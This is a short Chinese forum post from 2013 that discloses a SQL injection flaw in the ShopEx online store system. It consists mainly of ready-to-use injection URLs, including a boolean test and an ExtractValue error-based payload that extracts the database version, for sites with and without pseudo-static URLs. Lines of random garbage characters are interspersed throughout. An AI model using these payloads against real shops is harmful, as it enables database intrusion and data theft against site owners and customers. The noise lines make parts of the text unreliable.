注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
1 Q3 S: ], H7 r1 |- E. m7 U8 T) a: M
好吧,我扯远了~~. D- `2 h2 _2 x6 F( w4 A
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
1 `' `- \& h J6 N3 s1 C4 v不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
/ L% i6 d: q4 s" }4 X0 W' i
% M9 j4 k$ X) H+ a* t* }http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 9 X* A s- `, l \: A( z5 O$ e
" w/ m- E! h6 [4 chttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
) Q& n/ k7 n. u: a3 e
0 j' R' x2 s9 h& v; l, ^http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
. d7 M i2 W+ g, T0 K; v( \* J* R
2 f3 Z/ G1 S0 A. F( I0 e& l" ihttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
% j* k, q+ E# \! T. m/ m& G
$ G. o6 b$ {, b% z
) j& ]* H% V9 v& f4 t" w9 o% t6 Y一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
% o l) p2 f b" Z. `如何注入就不多说了,10多年的东西了…不会也会了…
' A6 C7 _$ E+ K/ ~1 k$ }7 X& C7 A) w8 k+ f3 s" \# X
* c( i9 Y1 P; a) E' t8 q4 P7 D+ I {; a
/ U7 l# B3 M6 A% W: J8 R |
发表于 2013-2-19 08:31:27
收藏
支持
反对